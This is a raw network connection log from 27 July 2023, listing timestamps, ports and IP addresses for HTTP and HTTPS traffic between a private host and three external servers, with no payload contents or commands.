Jul 27, 2023 20:18:47.314516068 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.314538002 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.314543962 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.314559937 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.314582109 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.314585924 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.314603090 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.314623117 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.314626932 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.315313101 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.315342903 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.315357924 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.315372944 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.315393925 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.315397024 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.315414906 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.315418005 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.315803051 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.315824986 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.315834045 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.315846920 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.315881014 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.315922022 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.315944910 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.315965891 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.315968990 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.315988064 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.316008091 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.316014051 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.316030025 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.316050053 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.316054106 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.316164970 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.316185951 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.316190004 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.316314936 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.316344976 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.316385984 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.316407919 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.316447973 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.316456079 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.316456079 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.316469908 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.316490889 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.316495895 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.316512108 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.316533089 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.316560984 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.316561937 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.316586018 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.317027092 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.317051888 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.317069054 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.317074060 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.317095995 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.317099094 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.317116976 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.317117929 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.317137957 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.317141056 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.317158937 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.317167997 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.317181110 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.317198992 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.317205906 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.317224979 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.317228079 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.317250013 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.317286968 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.317286968 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.317964077 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.329977989 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.330040932 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.330064058 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.330087900 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.330107927 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.330127001 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.330131054 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.330152988 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.330158949 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.330158949 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.330173969 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.330195904 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.330197096 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.330218077 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.330239058 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.330240965 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.330337048 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.330359936 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.330367088 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.330382109 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.330406904 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.331160069 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.331188917 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.331207991 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.331235886 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.333966970 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.428320885 CEST	49684	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:47.428363085 CEST	443	49684	162.0.217.254	192.168.2.4
Jul 27, 2023 20:18:47.428750038 CEST	443	49684	162.0.217.254	192.168.2.4
Jul 27, 2023 20:18:47.428880930 CEST	49684	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:47.431709051 CEST	49684	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:47.467004061 CEST	443	49684	162.0.217.254	192.168.2.4
Jul 27, 2023 20:18:47.467112064 CEST	49684	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:47.467139006 CEST	443	49684	162.0.217.254	192.168.2.4
Jul 27, 2023 20:18:47.467154026 CEST	443	49684	162.0.217.254	192.168.2.4
Jul 27, 2023 20:18:47.467303038 CEST	49684	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:47.528878927 CEST	49684	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:47.528918982 CEST	443	49684	162.0.217.254	192.168.2.4
Jul 27, 2023 20:18:47.794393063 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.872312069 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:48.859970093 CEST	49685	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:48.860032082 CEST	443	49685	162.0.217.254	192.168.2.4
Jul 27, 2023 20:18:48.860243082 CEST	49685	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:48.883321047 CEST	49685	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:48.883363962 CEST	443	49685	162.0.217.254	192.168.2.4
Jul 27, 2023 20:18:48.950154066 CEST	443	49685	162.0.217.254	192.168.2.4
Jul 27, 2023 20:18:48.950968981 CEST	49685	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:48.963680029 CEST	49685	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:48.963711977 CEST	443	49685	162.0.217.254	192.168.2.4
Jul 27, 2023 20:18:48.964222908 CEST	443	49685	162.0.217.254	192.168.2.4
Jul 27, 2023 20:18:48.964288950 CEST	49685	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:48.967272043 CEST	49685	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:49.001112938 CEST	443	49685	162.0.217.254	192.168.2.4
Jul 27, 2023 20:18:49.001353025 CEST	443	49685	162.0.217.254	192.168.2.4
Jul 27, 2023 20:18:49.001483917 CEST	49685	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:49.001483917 CEST	49685	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:49.071105957 CEST	49685	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:49.071156979 CEST	443	49685	162.0.217.254	192.168.2.4
Jul 27, 2023 20:18:49.128338099 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:49.129635096 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:49.144620895 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:49.145701885 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:49.203269958 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:49.203306913 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:49.206437111 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:49.256562948 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:49.256563902 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:49.273010969 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:49.273082018 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:49.334418058 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:49.334516048 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:49.335624933 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:49.838591099 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:50.081744909 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:50.081892014 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:50.082207918 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:50.372044086 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:50.861047983 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:50.861131907 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:50.861186028 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:50.861192942 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:50.861238003 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:50.861287117 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:50.861291885 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:50.861335039 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:50.861378908 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:50.861385107 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:50.861433029 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:50.861475945 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:50.861481905 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:50.861530066 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:50.861573935 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.104902983 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.104938984 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.104959011 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.104979038 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.104999065 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.105006933 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.105017900 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.105037928 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.105057001 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.105058908 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.105076075 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.105092049 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.105096102 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.105114937 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.105118036 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.105139017 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.105142117 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.105159044 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.105175018 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.105179071 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.105197906 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.105217934 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.105230093 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.105237007 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.105262995 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.105266094 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.105282068 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.105304003 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.105340004 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.105392933 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.136111975 CEST	49687	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:51.136182070 CEST	443	49687	162.0.217.254	192.168.2.4
Jul 27, 2023 20:18:51.136358023 CEST	49687	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:51.160777092 CEST	49687	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:51.160823107 CEST	443	49687	162.0.217.254	192.168.2.4
Jul 27, 2023 20:18:51.216880083 CEST	443	49687	162.0.217.254	192.168.2.4
Jul 27, 2023 20:18:51.217101097 CEST	49687	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:51.226797104 CEST	49687	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:51.226833105 CEST	443	49687	162.0.217.254	192.168.2.4
Jul 27, 2023 20:18:51.227294922 CEST	443	49687	162.0.217.254	192.168.2.4
Jul 27, 2023 20:18:51.230391979 CEST	49687	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:51.232522011 CEST	49687	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:51.272567034 CEST	443	49687	162.0.217.254	192.168.2.4
Jul 27, 2023 20:18:51.272736073 CEST	443	49687	162.0.217.254	192.168.2.4
Jul 27, 2023 20:18:51.272973061 CEST	49687	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:51.315366030 CEST	49687	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:51.315414906 CEST	443	49687	162.0.217.254	192.168.2.4
Jul 27, 2023 20:18:51.348567963 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.348618031 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.348645926 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.348670959 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.348690033 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.348709106 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.348728895 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.348747969 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.348767996 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.348788023 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.348798990 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.348807096 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.348829031 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.348850012 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.348875999 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.348901987 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.348907948 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.348928928 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.348948002 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.348958015 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.348988056 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.349014997 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.349016905 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.349035025 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.349054098 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.349066019 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.349072933 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.349095106 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.349114895 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.349133968 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.349158049 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.349159956 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.349184036 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.349204063 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.349212885 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.349242926 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.349250078 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.349270105 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.349298000 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.349315882 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.349338055 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.349344015 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.349363089 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.349390030 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.349411964 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.349421024 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.349431992 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.349452972 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.349471092 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.349477053 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.349492073 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.349524021 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.349545956 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.592756987 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.592797041 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.592818975 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.592839003 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.592859983 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.592880011 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.592910051 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.592931032 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.592952013 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.592981100 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593008041 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593020916 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.593029022 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593050957 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593071938 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593094110 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593116045 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593137026 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593148947 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.593158007 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593179941 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593200922 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593220949 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593223095 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.593242884 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593264103 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593286037 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593308926 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593331099 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593353033 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593358040 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.593374968 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593396902 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593416929 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593437910 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593446970 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.593460083 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593481064 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593501091 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593513966 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.593522072 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593544960 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593565941 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593575001 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.593586922 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593609095 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593630075 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593650103 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593660116 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.593671083 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593693018 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593713999 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593725920 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.593734980 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593756914 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593776941 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593796968 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593810081 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.593816996 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593838930 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.593872070 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.593945980 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:51.837225914 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.837277889 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.837301970 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.837327957 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.837357998 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.837382078 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.837409973 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:51.837424994 CEST	49686	80	192.168.2.4	115.88.24.200
